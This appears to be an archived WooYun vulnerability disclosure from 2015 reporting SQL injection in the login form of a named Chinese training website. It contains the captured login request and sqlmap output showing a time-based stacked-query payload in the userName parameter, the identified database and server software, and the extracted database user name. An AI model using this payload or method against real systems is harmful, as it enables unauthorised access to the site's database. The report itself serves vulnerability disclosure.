乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
恭喜恒大~
http://xjxy.91huayi.com/index.aspx
登录框
zhangsan@ubuntu:~/Desktop/sqlmap$ vim 1.txtPOST /zgpxServ/ManagerLoginServ.aspx HTTP/1.1Host: xjxy.91huayi.comUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/xml, text/xml, */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://xjxy.91huayi.com/index.aspxContent-Length: 25Cookie: Hm_lvt_b8b19370771d6914b2aac73158a962b8=1448095763,1448111452; Hm_lpvt_b8b19370771d6914b2aac73158a962b8=1448119133; Hm_lvt_ff0968fe442c4e89bf0c5108743a5f31=1448096058; Hm_lpvt_ff0968fe442c4e89bf0c5108743a5f31=1448119133Connection: keep-alivePragma: no-cacheCache-Control: no-cacheuserName=aaa&passWord=aaa
sqlmap resumed the following injection point(s) from stored session:---Parameter: userName (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userName=aaa';WAITFOR DELAY '0:0:5'--&passWord=aaa---[07:32:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005
盲注。
sqlmap resumed the following injection point(s) from stored session:---Parameter: userName (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: userName=aaa';WAITFOR DELAY '0:0:5'--&passWord=aaa---[07:31:03] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005[07:31:03] [INFO] fetching current user[07:31:03] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[07:31:13] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[07:31:23] [INFO] adjusting time delay to 1 second due to good response timesyaofukuicurrent user: 'yaofukui'
危害等级:无影响厂商忽略
忽略时间:2015-11-28 12:18
漏洞Rank:4 (WooYun评价)
暂无